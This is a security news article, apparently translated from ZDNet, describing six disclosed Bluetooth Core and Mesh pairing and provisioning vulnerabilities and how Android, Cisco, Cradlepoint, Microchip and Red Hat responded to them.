Hackers could exploit vulnerabilities in the Bluetooth Core and Mesh specifications to impersonate devices during the pairing process, paving the way for man-in-the-middle (MITM) attacks.
The vulnerabilities, disclosed by researchers from the National Information Systems Security Agency (ANSSI), allow “identity theft attacks and AuthValue disclosures”, according to an opinion from the CERT coordination center of Carnegie Mellon University.
Bluetooth Core and Mesh are separate specifications suitable for low power devices and Internet of Things (IoT) or multi-device communication (m: m) for large scale networks.
6 flaws identified
The vulnerabilities are as follows:
- CVE-2020-26558 : a vulnerability in the Passkey Entry protocol, used during Secure Simple Pairing (SSP), Secure Connections (SC) and LE Secure Connections (LESC) in Bluetooth Core (v.21 – 5.2). An attacker could send modified responses during peering in order to determine each bit of the passkey randomly generated during peering, which would lead to impersonation.
- CVE-2020-26555 : Another vulnerability in Bluetooth Core (v1.0B to 5.2), the BR / EDR PIN pairing procedure can also be used for impersonation purposes. Attackers can spoof the Bluetooth device addresses of a target device and perform pin code BR / EDR pairing without knowing the pin code. This attack requires a malicious device to be within wireless range.
- CVE-2020-26560 : impacting Bluetooth Mesh (v.1.0, 1.0.1), this vulnerability could allow attackers to spoof devices being provisioned via responses created to appear to have an AuthValue, which could give them access to an AuthValue. NetKey and a valid AppKey. An attacker’s device must be within the wireless range of a mesh provisioner.
- CVE-2020-26557 : Affecting Bluetooth Mesh (v.1.0, 1.0.1), the Mesh Provisioning protocol could allow attackers to perform a brute force attack and secure a fixed AuthValue, or a value that is “selected predictably or with low entropy ”, leading to MiTM attacks on future provisioning attempts.
- CVE-2020-26556 : If the AuthValue can be identified during provisioning, the Bluetooth Mesh authentication protocol (v.1.0, 1.0.1) is vulnerable and can be abused to secure a network key. However, the researchers note that attackers must identify the AuthValue before a session timeout.
- CVE-2020-26559 : the Mesh Provisioning procedure used by Bluetooth Mesh (v.1.0, 1.0.1) allows attackers without access to the AuthValue – to identify the AuthValue without needing a brute force attack.
“Even when a randomly generated AuthValue with 128-bit entropy is used, an attacker who acquires the public key of the provisioner, the provisioning confirmation value and the provisioning random value, and who provides his public key for use in the provisioning procedure, will be able to directly calculate the AuthValue, ”says the notice.
Researchers also identified a potential vulnerability in Bluetooth Core regarding LE Legacy peering in versions 4.0 through 5.2, which could allow an attacker-controlled device to perform the pairing without knowing the temporary keys (TK).
The reactions of Android, Cisco, Cradlepoint, Microship Technology and Red Hat
The open source Android project, Cisco, Cradlepoint, Intel, Microchip Technology and Red Hat are cited as vendors of software vulnerable to disclosed vulnerabilities in one form or another.
“Android has rated this issue as high severity for Android OS and will post a fix for this vulnerability in an upcoming Android security bulletin,” says the open source Android project.
“Cisco has studied the impact of the aforementioned Bluetooth specification vulnerabilities and is currently waiting for all individual product development teams to provide software patches to address them,” Cisco said.
Microchip Technologies is also working on fixes.
“Cradlepoint was made aware of the BLE vulnerabilities prior to their public disclosure,” the company said. “We have a production version of our NetCloud OS code (NCOS version 7.21.40) which corrects the cited issues. Therefore, we consider this security vulnerability to be addressed. “
Red Hat has provided links to advisories for CVE-2020-26555 and CVE-2020-26558. The organization’s products are not currently believed to be vulnerable to CVE-2020-26556, CVE-2020-26557, CVE-2020-26559, or CVE-2020-26560, but Red Hat is performing assessments to investigate any potential problem.
Update when available
The Bluetooth Special Interest Group (SIG), which is working on the development of global Bluetooth standards, has also issued separate safety advisories. To mitigate operational risk, updates from operating system manufacturers should be accepted as soon as they become available.
This research follows another Bluetooth-related security issue that was disclosed in September 2020 by scholars at Purdue University. Dubbed the Bluetooth Low Energy Spoofing Attack (BLESA), this vulnerability impacts devices that work with the Bluetooth Low Energy (BLE) protocol, a system used when the battery is limited.
Source : ZDNet.com